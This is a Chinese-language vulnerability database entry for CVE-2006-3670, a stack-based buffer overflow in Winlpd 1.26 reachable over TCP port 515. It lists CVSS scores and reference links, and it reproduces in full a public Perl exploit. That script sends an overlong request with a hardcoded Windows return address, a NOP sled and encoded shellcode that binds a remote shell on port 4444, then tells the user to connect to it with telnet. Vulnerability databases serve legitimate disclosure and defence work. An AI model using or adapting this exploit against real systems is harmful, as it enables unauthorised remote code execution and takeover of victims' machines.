CVE-2006-3670
CVSS7.5
发布时间 :2006-07-18 11:47:00
修订时间 :2011-03-07 21:39:11
NMCOE    

[原文]Stack-based buffer overflow in Winlpd 1.26 allows remote attackers to execute arbitrary code via a long string in a request to TCP port 515.


[CNNVD]Rabox WinLPD远程缓冲区溢出漏洞(CNNVD-200607-255)

         Winlpd 1.26存在基于栈的缓冲区溢出。远程攻击者可以借助对TCP 515端口的请求中的长字符串,执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3670
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3670
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-255
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2823
(UNKNOWN)  VUPEN  ADV-2006-2823
http://secunia.com/advisories/21058
(VENDOR_ADVISORY)  SECUNIA  21058
http://foro.elhacker.net/index.php/topic,131756.htm
(UNKNOWN)  MISC  http://foro.elhacker.net/index.php/topic,131756.htm
http://xforce.iss.net/xforce/xfdb/27759
(UNKNOWN)  XF  winlpd-long-request-bo(27759)
http://www.securityfocus.com/bid/19011
(UNKNOWN)  BID  19011
http://www.securityfocus.com/archive/1/archive/1/441302/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060727 Buffer Overflow Vulnerability in Winlpd
http://www.osvdb.org/displayvuln.php?osvdb_id=27332
(UNKNOWN)  OSVDB  27332
http://securitytracker.com/id?1016510
(UNKNOWN)  SECTRACK  1016510
http://milw0rm.com/exploits/2014
(UNKNOWN)  MILW0RM  2014

- 漏洞信息

Rabox WinLPD远程缓冲区溢出漏洞
高危 缓冲区溢出
2006-07-18 00:00:00 2006-07-20 00:00:00
远程  
         Winlpd 1.26存在基于栈的缓冲区溢出。远程攻击者可以借助对TCP 515端口的请求中的长字符串,执行任意代码。

- 公告与补丁

        

- 漏洞信息 (2014)

Winlpd 1.2 Build 1076 Remote Buffer Overflow Exploit (EDBID:2014)
windows remote
2006-07-15 Verified
515 Pablo Isola
[点击下载] [点击下载]
#!/usr/bin/perl

####################################################
#
# A proof of concept Remote Buffer Overflow Exploit
#
# App Vulnerable: Winlpd 1.2 Build 1076 - rabox.com
#
# Possibe some problems with WinXP if exploit doesn't
# work correctly, try another number in var 'loop'. 
#
# Buffer size 524 bytes. 
#
# Author: Pablo Isola - neuquencapital@hotmail.com
#
# Neuquen - Patagonia Argentina.
#
# To my friend 'Esteban T.' and all of my friends...
# you know who you are.
#
# Bug Discussion: http://foro.elhacker.net/index.php/topic,131756.htm
####################################################

use Getopt::Std;
use Socket;
my $SOCKET = "";

$loop = 51;  # 51 for Windows 2K and 100 to 120 for Windows XP 
$host = $ARGV[0];
$port = 515;


if (!defined $host){

	print "Error in Params.\n";
	print "Usage: winlpd_exp.pl [host] \n";
	print "Open remote shell on port 4444\n"; 
	exit;
}


print "\nA Remote Buffer Overflow Exploit\n".
"Coded by Pablo Isola - neuquencapital\@hotmail.com\nNeuquen - Patagonia Argentina\n\n";


$sc  = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66";
$sc .= "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6";
$sc .= "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa";
$sc .= "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f";
$sc .= "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb";
$sc .= "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba";
$sc .= "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb";
$sc .= "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc";
$sc .= "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61";
$sc .= "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70";
$sc .= "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44";
$sc .= "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7";
$sc .= "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69";
$sc .= "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9";
$sc .= "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0";
$sc .= "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3";
$sc .= "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7";
$sc .= "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0";
$sc .= "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67";
$sc .= "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1";
$sc .= "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0";
$sc .= "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88";
$sc .= "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d";
$sc .= "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95";
$sc .= "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2";

#0x77817477 return address for Windows 2K Professional 5.0.2195 SP4 Spanish
#0x77A12553 return address for Windows XP Professional 5.1.2600 SP1 Spanish

$ret = "\x77\x74\x81\x77";  # return address
$nop = "\x90" x 16;         # nops for padding
$str = "\x41" x 524 .$ret.$nop.$sc;

$iaddr = inet_aton($host)           || die "Unknown host: $host\n";
$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n";
$proto = getprotobyname('tcp')      || die "getprotobyname: $!\n";

for ($j=1;$j<$loop;$j++) {
	
	socket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die "socket: $!\n";
	connect(SOCKET,$paddr) || die "Lost Conection: $! .........ay Carumba?\n";
	send(SOCKET,$str, 0)	|| die "failure sent: $!\n";
	print "\nSending string: ".$j;
#	print "\nview:\n".$str."\n";
	sleep(1);
	close SOCKET;
	sleep(1);
}

print "\n\nTry: telnet remote_ip 4444\n\n".
"To my friend 'Esteban T.' and to all of my friends...you know who you are.\n".
"Have a nice day :)\n\n"; 

# milw0rm.com [2006-07-15]
		

- 漏洞信息

27332
Winlpd Long Request Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-07-15 Unknow
2006-07-15 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站